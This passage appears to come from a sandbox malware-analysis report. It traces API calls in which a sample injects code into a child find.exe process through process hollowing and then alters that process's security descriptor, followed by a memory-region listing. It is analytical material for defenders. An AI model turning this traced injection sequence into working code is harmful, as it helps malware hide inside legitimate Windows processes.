[303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0109.622] ReadProcessMemory (in: hProcess=0x330, lpBaseAddress=0x3a6008, lpBuffer=0x235abf8, nSize=0x4, lpNumberOfBytesRead=0x235aad8 | out: lpBuffer=0x235abf8*, lpNumberOfBytesRead=0x235aad8*=0x4) returned 1 [0109.626] VirtualAllocEx (hProcess=0x330, lpAddress=0x400000, dwSize=0xa3000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0109.639] WriteProcessMemory (in: hProcess=0x330, lpBaseAddress=0x400000, lpBuffer=0x33975b8*, nSize=0x400, lpNumberOfBytesWritten=0x235aad8 | out: lpBuffer=0x33975b8*, lpNumberOfBytesWritten=0x235aad8*=0x400) returned 1 [0109.664] WriteProcessMemory (in: hProcess=0x330, lpBaseAddress=0x401000, lpBuffer=0x2557dcc*, nSize=0x13800, lpNumberOfBytesWritten=0x235aad8 | out: lpBuffer=0x2557dcc*, lpNumberOfBytesWritten=0x235aad8*=0x13800) returned 1 [0109.882] WriteProcessMemory (in: hProcess=0x330, lpBaseAddress=0x415000, lpBuffer=0x256c464*, nSize=0x4200, lpNumberOfBytesWritten=0x235aad8 | out: lpBuffer=0x256c464*, lpNumberOfBytesWritten=0x235aad8*=0x4200) returned 1 [0109.926] WriteProcessMemory (in: hProcess=0x330, lpBaseAddress=0x41a000, lpBuffer=0x2571238*, nSize=0x200, lpNumberOfBytesWritten=0x235aad8 | out: lpBuffer=0x2571238*, lpNumberOfBytesWritten=0x235aad8*=0x200) returned 1 [0109.947] WriteProcessMemory (in: hProcess=0x330, lpBaseAddress=0x4a0000, lpBuffer=0x257200c*, nSize=0x2000, lpNumberOfBytesWritten=0x235aad8 | out: lpBuffer=0x257200c*, lpNumberOfBytesWritten=0x235aad8*=0x2000) returned 1 [0109.969] WriteProcessMemory (in: hProcess=0x330, lpBaseAddress=0x4a2000, lpBuffer=0x2574be0*, nSize=0x400, lpNumberOfBytesWritten=0x235aad8 | out: lpBuffer=0x2574be0*, lpNumberOfBytesWritten=0x235aad8*=0x400) returned 1 [0109.996] WriteProcessMemory (in: hProcess=0x330, lpBaseAddress=0x3a6008, lpBuffer=0x25757d8*, nSize=0x4, lpNumberOfBytesWritten=0x235aad8 | out: lpBuffer=0x25757d8*, lpNumberOfBytesWritten=0x235aad8*=0x4) returned 1 [0110.028] SetThreadContext (hThread=0x32c, lpContext=0x255100c*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x3a6000, Edx=0x0, Ecx=0x0, Eax=0x4139de, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0110.033] ResumeThread (hThread=0x32c) returned 0x1 [0110.066] EnumProcesses (in: lpidProcess=0x25769d8, cb=0x400, lpcbNeeded=0x19eb00 | out: lpidProcess=0x25769d8, lpcbNeeded=0x19eb00) returned 1 [0110.077] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x10a0) returned 0x338 [0110.077] GetExitCodeProcess (in: hProcess=0x338, lpExitCode=0x2576ff8 | out: lpExitCode=0x2576ff8*=0x103) returned 1 [0110.078] GetKernelObjectSecurity (in: Handle=0x338, RequestedInformation=0x4, pSecurityDescriptor=0x2577138, nLength=0x0, lpnLengthNeeded=0x239b818 | out: pSecurityDescriptor=0x2577138, lpnLengthNeeded=0x239b818) returned 0 [0110.078] GetKernelObjectSecurity (in: Handle=0x338, RequestedInformation=0x4, pSecurityDescriptor=0x25775f0, nLength=0x64, lpnLengthNeeded=0x239b818 | out: pSecurityDescriptor=0x25775f0, lpnLengthNeeded=0x239b818) returned 1 [0110.078] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x2577e60, cbSid=0x19eb30 | out: pSid=0x2577e60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x19eb30) returned 1 [0110.079] SetKernelObjectSecurity (Handle=0x338, SecurityInformation=0x4, SecurityDescriptor=0x2578298) returned 1 [0110.079] CloseHandle (hObject=0x338) returned 1 [0110.079] EnumProcesses (in: lpidProcess=0x2578604, cb=0x400, lpcbNeeded=0x19eb00 | out: lpidProcess=0x2578604, lpcbNeeded=0x19eb00) returned 1 [0110.081] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x10a0) returned 0x338 [0110.081] GetExitCodeProcess (in: hProcess=0x338, lpExitCode=0x2578c24 | out: lpExitCode=0x2578c24*=0x103) returned 1 [0110.081] GetKernelObjectSecurity (in: Handle=0x338, RequestedInformation=0x4, pSecurityDescriptor=0x2578d64, nLength=0x0, lpnLengthNeeded=0x239b818 | out: pSecurityDescriptor=0x2578d64, lpnLengthNeeded=0x239b818) returned 0 [0110.082] GetKernelObjectSecurity (in: Handle=0x338, RequestedInformation=0x4, pSecurityDescriptor=0x257921c, nLength=0x78, lpnLengthNeeded=0x239b818 | out: pSecurityDescriptor=0x257921c, lpnLengthNeeded=0x239b818) returned 1 [0110.082] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x2579acc, cbSid=0x19eb30 | out: pSid=0x2579acc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x19eb30) returned 1 [0110.082] SetKernelObjectSecurity (Handle=0x338, SecurityInformation=0x4, SecurityDescriptor=0x2579e10) returned 1 [0110.082] CloseHandle (hObject=0x338) returned 1 [0113.523] EnumProcesses (in: lpidProcess=0x257a42c, cb=0x400, lpcbNeeded=0x19eb00 | out: lpidProcess=0x257a42c, lpcbNeeded=0x19eb00) returned 1 [0113.532] OpenProcess (dwDesiredAccess=0x100400, bInheritHandle=0, dwProcessId=0x10a0) returned 0x338 [0113.533] GetExitCodeProcess (in: hProcess=0x338, lpExitCode=0x19eb18 | out: lpExitCode=0x19eb18*=0x103) returned 1 [0113.536] GetCurrentProcess () returned 0xffffffff [0113.537] GetCurrentProcess () returned 0xffffffff [0113.538] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x338, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x19ea9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x19ea9c*=0x334) returned 1 [0113.539] CloseHandle (hObject=0x334) returned 1 [0113.539] CloseHandle (hObject=0x338) returned 1 [0113.547] CoGetContextToken (in: pToken=0x19e9c0 | out: pToken=0x19e9c0) returned 0x0 [0113.547] CObjectContext::QueryInterface () returned 0x0 [0113.547] CObjectContext::GetCurrentThreadType () returned 0x0 [0113.547] Release () returned 0x0 [0113.548] CoGetContextToken (in: pToken=0x19e6dc | out: pToken=0x19e6dc) returned 0x0 [0113.549] CObjectContext::QueryInterface () returned 0x0 [0113.549] CObjectContext::GetCurrentThreadType () returned 0x0 [0113.549] Release () returned 0x0 [0113.551] CoGetContextToken (in: pToken=0x19e6dc | out: pToken=0x19e6dc) returned 0x0 [0113.551] CObjectContext::QueryInterface () returned 0x0 [0113.551] CObjectContext::GetCurrentThreadType () returned 0x0 [0113.551] Release () returned 0x0 [0113.628] CoGetContextToken (in: pToken=0x19e6dc | out: pToken=0x19e6dc) returned 0x0 [0113.628] CObjectContext::QueryInterface () returned 0x0 [0113.628] CObjectContext::GetCurrentThreadType () returned 0x0 [0113.628] Release () returned 0x0 [0113.630] CoGetContextToken (in: pToken=0x19e6f4 | out: pToken=0x19e6f4) returned 0x0 [0113.630] CObjectContext::QueryInterface () returned 0x0 [0113.630] CObjectContext::GetCurrentThreadType () returned 0x0 [0113.630] Release () returned 0x0 [0113.632] CoUninitialize () Thread: id = 2 os_tid = 0x13c0 Thread: id = 3 os_tid = 0xe48 Thread: id = 4 os_tid = 0x574 [0090.088] CoGetContextToken (in: pToken=0x443fc74 | out: pToken=0x443fc74) returned 0x0 [0090.088] CObjectContext::QueryInterface () returned 0x0 [0090.089] CObjectContext::GetCurrentThreadType () returned 0x0 [0090.089] Release () returned 0x0 [0090.089] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0090.089] RoInitialize () returned 0x1 [0090.089] RoUninitialize () returned 0x0 [0113.550] EtwEventUnregister (RegHandle=0x669298) returned 0x0 [0113.576] UnmapViewOfFile (lpBaseAddress=0x21e0000) returned 1 [0113.577] CloseHandle (hObject=0x324) returned 1 [0113.578] RegCloseKey (hKey=0x80000004) returned 0x0 Thread: id = 5 os_tid = 0xc94 Process: id = "2" image_name = "find.exe" filename = "c:\\windows\\syswow64\\find.exe" page_root = "0x26841000" os_pid = "0x10a0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x139c" cmd_line = "\"C:\\Windows\\SysWOW64\\find.exe\"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 415 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 416 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 417 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 418 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 419 start_va = 0xa0000 end_va = 0xdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 420 start_va = 0xe0000 end_va = 0xe3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 421 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 422 start_va = 0x100000 end_va = 0x101fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 423 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 424 start_va = 0xb80000 end_va = 0xb86fff monitored = 0 entry_point = 0xb823c0 region_type = mapped_file name = "find.exe" filename = "\\Windows\\SysWOW64\\find.exe" (normalized: "c:\\windows\\syswow64\\find.exe") Region: id = 425 start_va = 0xb90000 end_va = 0x4b8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b90000" filename = "" Region: id = 426 start_va = 0x771d0000 end_va = 0x7734afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 427 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 428 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 429 start_va = 0x7fff0000 end_va = 0x7dfa1676ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 430 start_va = 0x7dfa16770000 end_va = 0x7ffa1676ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfa16770000" filename = "" Region: id = 431 start_va = 0x7ffa16770000 end_va = 0x7ffa16930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 432 start_va = 0x7ffa16931000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffa16931000" filename = "" Region: id = 433 start_va = 0x400000 end_va = 0x4a2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 434 start_va = 0x4b0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 435 start_va = 0x640d0000 end_va = 0x6411ffff monitored = 0 entry_point = 0x640e8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 436 start_va = 0x64050000 end_va = 0x640c9fff monitored = 0 entry_point = 0x64063290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 437 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 438 start_va = 0x64120000 end_va = 0x64127fff monitored = 0 entry_point = 0x641217c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 439 start_va = 0x5b0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 440 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 441 start_va = 0x76910000 end_va = 0x76a8dfff monitored = 0 entry_point = 0x769c1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 442 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 443 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 444 start_va = 0x110000 end_va = 0x1cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 445 start_va = 0x73f30000 end_va = 0x73f8efff monitored = 0 entry_point = 0x73f34af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 446 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 447 start_va = 0x76cb0000 end_va = 0x76cf3fff monitored = 0 entry_point = 0x76cc9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 448 start_va = 0x76c00000 end_va = 0x76cacfff monitored = 0 entry_point = 0x76c14f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 449 start_va = 0x73f00000 end_va = 0x73f1dfff monitored = 0 entry_point = 0x73f0b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 450 start_va = 0x73ef0000 end_va = 0x73ef9fff monitored = 0 entry_point = 0x73ef2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: 